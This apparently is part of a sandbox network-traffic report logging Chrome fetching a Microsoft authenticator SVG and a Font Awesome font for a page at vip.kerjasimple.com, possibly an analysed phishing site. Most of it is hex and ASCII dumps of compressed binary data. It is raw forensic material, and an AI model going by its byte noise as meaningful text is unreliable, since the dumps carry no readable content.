                                                        Data Ascii: 3&c1!1130-1=330K+&krr2rgq6pq3rw25?'FX[TNUYUHG}_4B4Q4Y4]4_X+VG_tPtXGu\'tY7tSJo^$}OPZbKk-5FZ0ncl#vN9b=W~_='s{~/ER^+xe57&[{'=!>
                                                        2024-11-12 15:27:05 UTC1369INData Raw: dc d8 8d dc c0 f5 c1 f5 5c 17 5c c7 b5 5d cb 65 2c c7 1c fc 96 f3 39 2f 38 8f 73 3b a7 fe d1 5f d0 1f fd d0 17 7d d4 0b d0 73 d0 33 3d d5 23 3d 04 3d 00 dd d7 3d dd d1 2d 5d d1 25 9d d5 19 1d 03 1d 06 1d d4 01 ed 01 ed 06 d0 66 d0 26 d0 06 00 ad 00 2d d3 52 2d d6 0c d0 34 d0 54 d0 94 be ff b5 ef 44 d0 58 8d 01 0d d5 10 0d d6 40 f5 57 1f f5 52 0f 75 51 47 b5 53 7d d5 53 55 50 89 f8 37 fe 89 3f f1 1b 20 1e c6 cd 38 15 fb 63 5f ec 8e 1d b1 35 b6 c4 c6 58 1f ab 63 49 cc 80 98 1a e3 63 58 f4 89 de d1 2e da 46 eb 68 15 2d a2 79 34 8b a6 d1 24 1a 46 fd a8 17 75 a2 46 54 8d 2a 51 39 2a 44 f9 c8 a2 6c 94 86 28 1e c5 a2 68 44 a4 28 12 85 23 2f a4 ff d3 9f f4 23 7d 4b 5f d3 97 f4 39 bd 4d 2f d3 f3 f4 34 3d 86 74 35 9d 87 74 0e d2 59 48 67 20 9d 4e a7 d2 c9 74 22 1d
                                                        Data Ascii: \\]e,9/8s;_}s3=#===-]%f&-R-4TDX@WRuQGS}SUP7? 8c_5XcIcX.Fh-y4$FuFT*Q9*Dl(hD(#/#}K_9M/4=t5tYHg Nt"
                                                        2024-11-12 15:27:05 UTC1369INData Raw: 0d f3 01 c0 7e 05 32 40 06 10 20 01 72 80 02 75 80 ba 40 00 1a 01 ad 81 02 40 3b 60 0c 50 0a 98 0c 4c 06 ca 03 53 80 29 40 05 60 2a 30 15 a8 08 4c 03 a6 01 95 80 e9 c0 74 a0 32 30 03 98 01 54 01 66 f2 b7 a8 0a cc 2a aa 01 b3 8b ea c0 9c a2 06 30 b7 88 81 79 45 06 98 5f 64 81 05 45 02 2c 2c f2 80 45 45 0e 58 5c a4 c0 92 a2 26 b0 b4 a8 05 2c 2b 6a 03 cb 8b 3a c0 8a a2 2e b0 b2 a8 07 ac 2a ea 03 ab 8b 06 c0 9a 83 1a 02 17 43 37 02 97 42 37 03 57 42 9f 00 ae 86 76 02 ae 83 15 04 6e 83 de 05 dc 0d ed 0c bc 0e d9 07 fc 0e fb 08 e2 32 90 d7 21 ae 0a ed 0b 71 35 68 3f 88 5b 43 bb 41 dc 06 da 1d e2 4b a0 67 20 be 02 ba 09 e2 2b a1 5b 21 be 0a fa 0a c4 d7 40 37 40 7c 0b fc 3d 88 ef 40 68 04 f1 bd d0 2d 90 c9 c2 0a 40 e6 20 e4 05 c8 1c 82 bc 04 99 c3 90 17 21 73 04
                                                        Data Ascii: ~2@ ru@@;`PLS)@`*0Lt20Tf*0yE_dE,,EEX\&,+j:.*C7B7WBvn2!q5h?[CAKg +[!@7@|=@h-@ !s
                                                        2024-11-12 15:27:05 UTC1369INData Raw: 15 68 0f 93 2b 0a 71 28 b9 52 66 1c 44 ae 4c ae 45 7b 9c 5c 87 dc bc ad d9 e4 16 a0 3d 47 6e 89 f6 3c b9 55 4f 7b 99 dc 86 dc a9 bd de e4 ce c0 20 72 17 b4 b7 c9 5d 27 34 90 dc 8d dc 8b f6 0e b9 0f 79 14 ed 43 f2 18 65 b4 ef c9 e3 c9 93 68 3f 90 27 0b 71 06 79 0a e2 4c f2 54 b4 22 4f 33 b6 09 a7 f3 33 b6 9f c9 33 c9 b3 68 bf 90 e7 90 e7 d2 7e 23 cf 27 2f a4 fd 41 5e 24 c4 c4 e4 c5 68 37 91 97 4c d8 fe 26 af 20 af a2 fd 43 5e 43 5e 4b fb 9f bc 4e 3d b1 30 79 3d 79 d7 f5 7d db 21 ef 21 ef 23 46 90 cf 90 2f 11 a3 c9 57 c8 57 89 a9 c8 b7 c8 8f 88 69 c8 4f 30 7e 76 db 67 e4 e7 fb 2a 4d 7e d1 61 c0 79 64 8f f6 19 f9 65 4f 4b f2 2b f2 c7 36 d6 56 32 c9 5f 89 05 c8 df 40 b7 08 f9 3b e2 44 f2 8f cc b8 8e fc 93 fc 9f 58 94 42 0d de cf 6c 6a 08 19 dd 26 d4 50 6a 38
                                                        Data Ascii: h+q(RfDLE{\=Gn<UO{ r]'4yCeh?'qyLT"O333h~#'/A^$h7L& C^C^KN=0y=y}!!#F/WWiO0~vg*M~aydeOK+6V2_@;DXBlj&Pj8
                                                        2024-11-12 15:27:05 UTC1369INData Raw: 02 ed 15 b2 37 ed 35 da eb e4 00 da 9b b4 b7 c9 41 b4 0f 48 e4 50 da c7 22 87 d1 3e f5 c8 e1 b4 cf 69 5f 90 23 68 5f 49 e4 28 da b7 22 47 d3 7e 10 39 86 f6 8b c8 b1 b4 df 3d 72 1c ed 3f b4 ff 92 e3 a9 61 24 72 22 15 91 93 a8 31 45 4e a6 c6 11 39 85 9a 48 e4 54 6a 0a 91 d3 a8 a9 36 62 4e a7 a6 a5 a6 23 67 50 33 51 33 93 b3 a8 d9 a9 39 c9 39 d4 02 f2 c8 f9 d4 22 d4 a2 e4 02 6a 29 89 5c 44 2d 2b 72 31 b5 82 c8 25 d4 ca 22 97 52 6b 88 5c 46 ad e5 91 cb a9 75 a8 f5 c8 15 d4 86 f2 c8 d5 d4 66 d4 e6 e4 1a 6a 6b e5 cc 75 d4 b6 d4 f6 e4 7a 6a 27 6a 17 72 13 b5 9b 44 6e a5 f6 10 b9 8d da 57 e4 76 6a ff 9c b9 83 3a 90 3a 88 dc 49 1d 42 1d 4a ee a6 8e 50 ce dc 4b 1d 45 1d 4b ee a3 4e a0 4e 22 0f 51 e7 2b 67 1e a5 2e a4 2e 21 8f 51 57 52 57 91 a7 a8 1b 24 f2 0c 75 93
                                                        Data Ascii: 75AHP">i_#h_I("G~9=r?a$r"1EN9HTj6bN#gP3Q399"j)\D-+r1%"Rk\Fufjkuzj'jrDnWvj::IBJPKEKNN"Q+g..!QWRW$u
                                                        2024-11-12 15:27:05 UTC1369INData Raw: bf 90 f0 38 ca bf 92 b8 09 ca 85 e8 54 94 7f 27 fa 11 e5 bf 2b 54 5b 1d fa 6f 25 07 f4 29 72 41 e2 72 e4 46 e2 58 e4 b5 88 2e 46 5e 87 e8 12 e4 75 49 f8 05 79 3d 12 1e 43 5e 9f e8 08 e4 8d 89 7e 42 de 84 e8 7c e4 4d 89 fe 46 de 8c 84 91 c8 9b 93 f0 14 f2 16 44 57 21 6f 49 42 23 e4 ad 48 38 17 79 77 a2 f7 91 f7 24 a1 0e f2 5e c4 de 46 de 8f d8 71 c8 87 91 b0 00 f9 70 0b 6e 26 c4 2e 41 3e 9b d8 ad c8 e7 90 78 2d f2 b9 c4 ae 47 3e 8f d8 2d c8 e7 13 7b 04 f9 02 62 ef 20 5f 4a 74 06 f2 ed d5 7e 89 ef 84 fa 47 e2 bb 42 ec 2b e4 7b 92 f0 2e f2 bd 89 7d 83 7c 7f f5 95 c4 0f 84 54 2b 91 1f 46 42 6f e4 c7 a8 bf 26 7e 1c 24 4e 45 7e 3c b1 75 c8 4f 20 e1 39 e4 67 92 6a 32 f2 b3 48 34 e4 57 68 99 4f fc 4a 48 5c 85 fc 1a a2 ab 91 5f 4b c2 93 c8 af d3 32 99 f8 ad 90 6a
                                                        Data Ascii: 8T'+T[o%)rArFX.F^uIy=C^~B|MFDW!oIB#H8yw$^Fqpn&.A>x-G>-{b _Jt~GB+{.}|T+FBo&~$NE~<uO 9gj2H4WhOJH\_K2j
                                                        2024-11-12 15:27:05 UTC1369INData Raw: d3 f4 fc 72 58 32 f9 3e 8d 61 b9 12 71 43 37 4c 87 73 2f 8e dc 5e b5 3c cc 4e f3 83 72 18 33 26 71 c6 98 5c 24 9a 46 74 c7 11 82 9a 1a 21 84 50 6e fb ca 30 2d c9 d1 60 16 97 95 6a a3 16 84 b6 a5 b5 56 fb 17 4a 11 35 4a 99 c9 b9 e0 86 6e 50 d3 d4 4c 6e fb ae 61 52 f5 93 d5 ac 05 01 b3 48 2a 19 bb 1e a3 0e 00 a7 38 f5 e3 d9 15 00 98 a5 bd 36 45 d3 71 f3 e0 68 b8 91 1b a3 a2 37 2a b2 3c cb 4d 6a d2 38 89 13 c3 a4 bd 58 69 54 e4 7e 2e bc cf 16 c2 9e cf 18 b3 85 b0 71 cc d8 fc b7 aa be 8f e8 fb d5 cf bb 46 48 dd 0b f7 31 36 9f d9 42 d8 8c e1 d8 16 c2 be af 97 67 ad fa 3e 4e df f7 08 20 94 f7 76 f0 33 b8 0d e7 03 74 cc b4 bd 8e 76 35 fb 56 8b d1 26 9a 6f 46 12 37 f0 d6 d5 4f e2 1a 5a 7a 06 35 15 3a 45 7e fc 84 ed 5b d6 3d 8c 09 61 db f7 5a 96 6f 9b 9a c6 ef b9
                                                        Data Ascii: rX2>aqC7Ls/^<Nr3&q\$Ft!Pn0-`jVJ5JnPLnaRH*86Eqh7*<Mj8XiT~.qFH16Bg>N v3tv5V&oF7OZz5:E~[=aZo


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.2.64976613.107.246.454436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:05 UTC677OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                        Host: aadcdn.msauth.net
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://vip.kerjasimple.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:05 UTC785INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:05 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 2407
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                        ETag: 0x8DB5C3F499A9B99
                                                        x-ms-request-id: 8f34a892-a01e-0010-2ca4-2c063e000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20241112T152705Z-16547b76f7fx6rhxhC1DFW76kg0000000fq000000000n7zf
                                                        x-fd-int-roxy-purgeid: 4554691
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:05 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                                        Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.2.649770104.17.25.144436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:05 UTC657OUTGET /ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2 HTTP/1.1
                                                        Host: cdnjs.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://vip.kerjasimple.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:05 UTC975INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:05 GMT
                                                        Content-Type: application/octet-stream; charset=utf-8
                                                        Content-Length: 105536
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=30672000
                                                        ETag: "623a082a-19c40"
                                                        Last-Modified: Tue, 22 Mar 2022 17:32:26 GMT
                                                        cf-cdnjs-via: cfworker/kv
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Timing-Allow-Origin: *
                                                        X-Content-Type-Options: nosniff
                                                        CF-Cache-Status: HIT
                                                        Age: 595396
                                                        Expires: Sun, 02 Nov 2025 15:27:05 GMT
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dBbQEJzR6YZoG2TeKxB%2B1ocB8Rvf0Wiqd%2FqeIFP0aJq3xiQ7LDSWLhGD4fEXkuKPspO2b3tfUdKwLwgXmeEQfoy7UgiCR1HCrkEOI7hdgEPARVsDjnjEraMfA6pgriO5ZUXoJxOd"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                        Strict-Transport-Security: max-age=15780000
                                                        Server: cloudflare
                                                        CF-RAY: 8e178b4c8cf84612-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-11-12 15:27:05 UTC394INData Raw: 77 4f 46 32 00 01 00 00 00 01 9c 40 00 0a 00 00 00 02 af a4 00 01 9b f6 03 01 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 8f 50 00 8d 48 ca 8a a8 1c cb 8f 54 05 88 20 07 20 a5 d1 57 51 67 00 82 f3 00 00 b0 56 3f 0f aa 48 d7 49 ed 1e 00 55 d5 3a 31 b8 a9 1a 10 7e fa e5 b7 3f fe fa e7 bf bf 0a 8c dd 0d b1 8e eb f9 86 ff fa fd ca 73 fb ff 99 79 0b c4 2a 8a f0 85 59 ae 4b 45 46 c8 0e 94 1f b5 b1 ec 53 51 ab 52 5d d1 a4 48 11 48 40 95 6f 61 8e b6 88 fa e3 a3 7e 3f c4 dd 7b 26 40 67 36 69 8a fb 61 db db d0 55 12 e6 a5 e6 b0 7a 35 f5 a3 b8 78 c2 af a8 ff 3c aa ea df f3 00 bc 87 87 49 90 00 1e 87 c4 05 12 90 2c c9 22 09 12 b0 a5 d8 92 57 1a 37 76 e2 24 76 b3 7f 9c 74 8c e9 46 5d e9 da e9 58 ea 58 5b e9 1f 6b a9 fd
                                                        Data Ascii: wOF2@8$ `PHT WQgV?HIU:1~?sy*YKEFSQR]HH@oa~?{&@g6iaUz5x<I,"W7v$vtF]XX[k
                                                        2024-11-12 15:27:05 UTC1369INData Raw: bf 2d a5 62 f6 81 14 3e e2 d9 4e 45 24 63 ad 07 4f a9 09 41 54 e1 9f aa eb fb 93 77 20 e5 48 8d 41 f7 1b 79 4b 36 aa f1 50 59 51 95 03 e3 63 ef 25 c4 a5 b8 b4 fc ff f7 7d d3 ca 69 a4 36 ce d5 58 1b b7 b1 d1 18 17 3a 1f 44 7b 9f fb 82 7b df fb c1 7d 1f 08 ee ff 40 f0 3e 50 c1 03 aa 82 f7 81 0a 1e 50 7c 1f 80 d8 1f a8 92 1a 55 64 f7 42 51 ec 5e 25 b3 66 15 25 4d af 62 89 dd 8b 52 b7 7f 1f 68 f3 81 6a f3 50 55 6b cd 03 a9 e0 81 6c f3 8b 1a 03 92 63 8a ea a9 22 c7 d0 05 a2 a4 35 4b 6e b4 c8 a6 da 19 4a 63 b4 26 9a c9 26 9c 09 e3 22 95 14 39 1d 8c f1 d9 04 51 60 8c f3 c7 d0 de e4 fe 1a 6d 12 45 c0 c7 f2 3a 4d c6 0c ff bb a6 15 5c 88 90 79 49 4d 64 5a 5d be d5 5d aa 49 08 d8 2a a3 91 a2 23 74 f4 73 68 6b 97 75 dc e0 20 04 4c 64 99 5d 7b df c7 26 04 08 10 c0 c6
                                                        Data Ascii: -b>NE$cOATw HAyK6PYQc%}i6X:D{{}@>PP|UdBQ^%f%MbRhjPUklc"5KnJc&&"9Q`mE:M\yIMdZ]]I*#tshku Ld]{&
                                                        2024-11-12 15:27:05 UTC1369INData Raw: 2e b6 f9 2d b5 f6 c6 7a 73 3f b9 6c ec 30 7f fa 87 ae f7 5f 5c 5e a3 48 5f 0c c0 40 0c c3 08 8c c4 78 4c c3 2c cc df fe 24 dc 80 2d d8 86 53 b8 84 07 78 86 78 7c 83 cf d4 cc c8 6c cc c9 b2 2c c7 2a ac ce 86 ec c2 6e ec c9 c1 1c c6 49 9c c6 59 5c c1 95 78 d0 4b f4 4a bd 59 6f d7 bb f4 6e bd 4f 1f d3 97 f4 63 fd 5a bf 33 1d 4d 37 33 cc 8c 35 13 cd 34 33 d3 cc 37 cb cd 6a b3 de 6c 31 87 cc 39 73 d1 5c 31 db 6a 37 cc 3d f3 c0 bc 35 ef cd 97 ed fe 06 4c 96 1f e4 e7 f1 43 fc 18 bf 80 5f 68 fb 7d ff c9 ff e2 7f 0d 88 cb af ef 2a 9a dc 29 79 c4 2f 3d 2f 79 69 f2 de e4 83 c9 27 7f 77 de 26 7f 4c 29 99 52 e5 cb 77 f6 9b ec 07 d9 37 e9 a7 bf b3 e1 b9 5e b8 07 4f ba ef dd e7 ee 53 f7 98 7b 24 a1 6f 02 c5 bf 8f ef 1e 5f 32 5e c4 a5 c7 ed 8e db 1a 17 1d fb 42 dd 50 e7
                                                        Data Ascii: .-zs?l0_\^H_@xL,$-Sxx|l,*nIY\xKJYonOcZ3M735437jl19s\1j7=5LC_h}*)y/=/yi'w&L)Rw7^OS{$o_2^BP
                                                        2024-11-12 15:27:05 UTC1369INData Raw: 60 59 b6 67 f5 9a a3 85 96 6d c7 dd 0b 1e 5a 39 61 c6 dc 69 b5 5a cb e8 9c b3 5d 47 9a 76 d6 2e 93 a4 d9 ec 44 60 7c 72 75 4d 3f a0 be bc 79 ec d2 d2 42 0b be 37 a5 4e 04 8d 03 18 d4 5c 6c 33 79 2f 56 b1 c0 55 fb 56 d5 34 1d 4d e3 bf f4 6b 60 9c 02 a8 6a 99 26 9e 34 df a9 e8 c2 75 1c 5c 70 96 86 5f a9 dc 4b 11 de b3 da 34 a6 d3 44 43 43 44 5c 70 31 b7 5a e4 d8 ad 69 96 ae 3b 71 3b 17 5c 24 69 86 41 ad 76 e5 f5 7f 87 c1 49 80 e1 a0 e8 16 83 21 90 d4 3d 0f c3 41 b1 5d 0c 86 f0 bc fa f3 ba ad 6a 15 a8 56 5b ef 43 a3 ed 66 6f 77 bf 3a 98 71 d8 7f 38 28 66 83 6a ab d9 6d d9 bf db 6c 55 df 86 6a b5 45 7d 82 ad 6a 15 f3 bd d6 0e 9b 8e b4 69 94 33 c7 62 15 ab aa d0 98 94 c5 cf 48 9f 4b 07 46 0d 76 0d 98 35 ee fb 8e 5b 73 db 34 d8 bd cd 67 db a1 03 32 a6 fa 50 39
                                                        Data Ascii: `YgmZ9aiZ]Gv.D`|ruM?yB7N\l3y/VUV4Mk`j&4u\p_K4DCCD\p1Zi;q;\$iAvI!=A]jV[Cfow:q8(fjmlUjE}ji3bHKFv5[s4g2P9
                                                        2024-11-12 15:27:05 UTC1369INData Raw: 62 d5 ef c7 31 de 43 04 ea 1c ec e3 32 76 e9 f8 7d 0c dc 19 ed d8 fd f2 0e 63 47 bb 16 b4 81 a8 22 76 34 de 43 fe f2 83 52 e0 17 ac f5 f4 f0 fa ca a1 86 63 18 3a 77 6c 77 73 32 69 45 3a 57 f5 ad 41 3a 54 ca 94 87 ce bc c2 e5 42 d7 6c c7 3d 35 1c 7a b5 ed df 3d 67 8e 34 43 c0 b1 6d 6e 3b ae 63 18 86 e2 86 6f 37 db 41 10 58 15 bf d3 9e 8e 17 56 07 ba 6d 7b 2e e7 5a a0 69 b6 13 77 2a af a3 2b ed f6 94 7f d4 da fc 36 33 23 17 27 74 1c 6a 9a 62 d6 ec 1f a8 d5 e0 b2 c1 9c bf 9a cb 84 75 91 a4 9b fe 0e ad 39 c8 88 5e 3f 7b f6 cb ec b0 a2 bc e1 86 b2 68 0e 07 85 78 87 eb f5 f8 de 85 a2 60 ac 28 2e 7c ef 11 cd fe de 6c 30 00 06 83 59 5d c7 75 a9 bf 8c 8b 34 d3 9e 43 d8 c2 7a 18 0b 21 f7 43 e5 ae 9e ff c2 17 19 8e e3 b8 86 ae e3 69 73 f9 f6 d9 58 75 fe ab 38 ea 1a
                                                        Data Ascii: b1C2v}cG"v4CRc:wlws2iE:WA:TBl=5z=g4Cmn;co7AXVm{.Ziw*+63#'tjbu9^?{hx`(.|l0Y]u4Cz!CisXu8
                                                        2024-11-12 15:27:05 UTC1369INData Raw: bd 2c 77 0f bb 54 a5 98 0e 13 0d 0d 84 7e 24 f0 e4 cf a6 59 9a 0d 83 5e a0 25 b3 44 d7 53 c6 0b 0c f0 bb ea ac c4 8a ed 86 9e eb ba 61 e4 7a 9c db f3 3f c6 de d9 19 2a 4b ad 38 72 6c db 89 e2 66 c5 73 9d 23 5f e4 ae 1b c6 ae e7 79 91 63 db fc df e6 db d8 9b bf b2 de f2 dc 58 2d 2c c4 ca 75 0d c3 b9 ce 21 4e 74 b0 ff fc ce fb 1a ba 85 1e 41 cf a5 0f 10 95 b3 b5 35 cd d2 44 ba 9c 26 fa 49 3f 49 9f e4 84 0a a3 30 d2 9c 53 b1 8a cb 49 3e c9 a5 24 50 ba 3d d3 d9 74 56 98 39 45 a5 39 86 0b 2e ca ba 86 e2 62 a0 cc e5 08 da 31 5a 28 78 c2 93 7e d2 cf fa 59 3a 4b 67 d3 d9 b4 9c 96 45 5e e4 93 7c a2 26 2a 8e e2 28 8c 42 b1 df f5 7c 3f 58 5c 0c 84 ef ab 2b 32 f6 ea 8d 90 1b 06 8f ea 75 2f 96 06 29 bd 56 30 b6 bd 8a 57 c6 71 1c b7 56 57 5b 36 94 4a 2e d9 86 61 70 cb
                                                        Data Ascii: ,wT~$Y^%DSaz?*K8rlfs#_ycX-,u!NtA5D&I?I0SI>$P=tV9E9.b1Z(x~Y:KgE^|&*(B|?X\+2u/)V0WqVW[6J.ap
                                                        2024-11-12 15:27:05 UTC1369INData Raw: f3 a2 54 71 99 15 a5 9a cc b2 a2 54 93 b2 58 47 51 4e f3 b2 58 47 31 bb b7 78 0b 45 26 9a cd e6 a7 d3 2c 9f 1c c3 54 24 ee 4c 6f e9 72 ee 1b d2 65 c0 ec 1d c7 2a e1 55 eb 6f 22 56 59 59 ac 23 8f 92 b4 cc 8a 92 18 82 a3 1a 75 ae 98 0b 9e 28 85 72 45 36 ca 6c 66 a9 74 05 45 a9 e2 2d 2d 7e 3d c1 3b 88 45 d2 5f 44 28 b8 c8 dc 73 ea 54 a6 cf ca ff 2a 62 3c 51 b1 e0 09 fe 3f 46 cd 30 eb f0 75 d9 00 60 69 b2 c9 18 97 0d c6 c0 a4 d2 98 a1 99 91 a6 49 dd 0c 34 cd e3 dc d3 b4 c0 d4 25 c0 58 64 6a 06 d3 94 64 60 ac 21 39 63 0d 83 31 66 01 68 48 dd 47 dd 34 6a 88 39 8f af 71 2c 63 cc 68 7c 7d 2f a6 bd 58 8c 01 5f 8f 02 63 ea f3 e7 dd d4 9f 02 23 21 ee 77 75 73 b8 bc 94 9a 9a db 35 cd b7 69 da 1a 46 ba 65 71 30 4d 63 a6 b0 ae 37 a5 10 42 0a a1 eb 1e be 0b 21 4c d3 d4
                                                        Data Ascii: TqTXGQNXG1xE&,T$Lore*Uo"VYY#u(rE6lftE--~=;E_D(sT*b<Q?F0u`iI4%Xdjd`!9c1fhHG4j9q,ch|}/X_c#!wus5iFeq0Mc7B!L
                                                        2024-11-12 15:27:05 UTC1369INData Raw: c8 b5 30 de d8 68 78 ae e7 d5 df 59 58 fb 2f e6 df eb 2b 05 28 d5 47 fb f3 69 6c 55 ab ad f9 f7 5a d5 6a b5 da 42 bb 55 ad 5e 39 f6 75 f3 fd f7 b8 9e 8a 3c f7 9d f7 b8 5e 1c 7b ee dd 50 aa 7f 9a e5 f3 d7 ff 1d ab 56 5b 95 03 2a 20 b2 c8 39 d8 c7 17 b0 4b 7d 3a 41 d7 d3 9d f4 58 7a 36 bd 94 de 4c ef a7 cf 12 95 83 bb 35 9b ae 63 2d 9d fa e0 8b 08 3b 30 32 e6 1d 83 8a 73 d5 f7 31 4b 9d 34 3a f2 78 99 68 17 bb 05 bc e3 84 56 94 e3 02 a1 75 44 14 2b bb c7 91 69 a6 b6 7f ea ec 53 8b 39 6a 0e 29 fb 7b 2f 8e 8e dd 29 9f d0 98 e6 80 3d fd 5a c3 88 0d e3 61 86 11 6b 4c d7 b4 a7 01 6f 61 da 83 61 f8 1e c7 83 99 26 61 3c 9c 31 8d 3d 5c 07 93 43 8f 73 6e 3a 8e a9 b1 68 db e3 42 08 b7 6c b6 b6 85 ae 78 7b ef ee ed 63 ba 8f ef b7 eb 9b 1e e7 3c 5b fc c9 e2 4f 35 df 86
                                                        Data Ascii: 0hxYX/+(GilUZjBU^9u<^{PV[* 9K}:AXz6L5c-;02s1K4:xhVuD+iS9j){/)=ZakLoaa&a<1=\Csn:hBlx{c<[O5
                                                        2024-11-12 15:27:05 UTC1369INData Raw: 1d bf 80 f9 ef c1 58 7e 1d 6f d9 00 a6 d0 3f 87 fa 9b bf 8c 01 9a 21 ab 17 f8 6f 46 d8 a3 15 da a6 8b f4 28 22 c4 62 82 0d f5 d2 90 86 20 b7 b1 35 3b c8 67 97 e6 b0 fa b5 c7 22 cd d2 a4 d7 17 7c 11 a1 53 c2 cd 8c 78 86 d2 f7 8d 63 8f 50 e3 bc fe 8a a2 18 fe a5 c1 d0 6c 2c cd bf b2 d4 68 02 cd c6 d2 62 43 82 14 5b 67 6f b9 56 ba d8 ab 33 1b 8b 4b 8d 0c 96 f4 e6 7b 9e 25 a5 e5 61 db b3 24 e6 3f 96 80 94 be 27 2d 4b 7a 9e f5 ed aa f5 3c 5f 5a 90 96 e7 49 dc d2 ca 7e e3 d4 15 34 57 7e 25 6b 35 d0 34 3d d7 94 f2 cc 19 29 4d d7 33 9b 68 5c ed 4b 29 a5 ff 1d 2f 36 a1 dd f2 be b3 22 bd de 49 e7 5b 45 5c ce 49 e9 06 b6 83 6d ba 48 77 d3 13 e8 b9 f4 46 bc 24 20 36 50 85 19 0c 03 b1 7a c6 51 14 e5 68 96 f4 a5 ed e1 32 17 ba d7 14 5c f0 64 34 e6 c9 68 dc 47 53 76 e0
                                                        Data Ascii: X~o?!oF("b 5;g"|SxcPl,hbC[goV3K{%a$?'-Kz<_ZI~4W~%k54=)M3h\K)/6"I[E\ImHwF$ 6PzQh2\d4hGSv
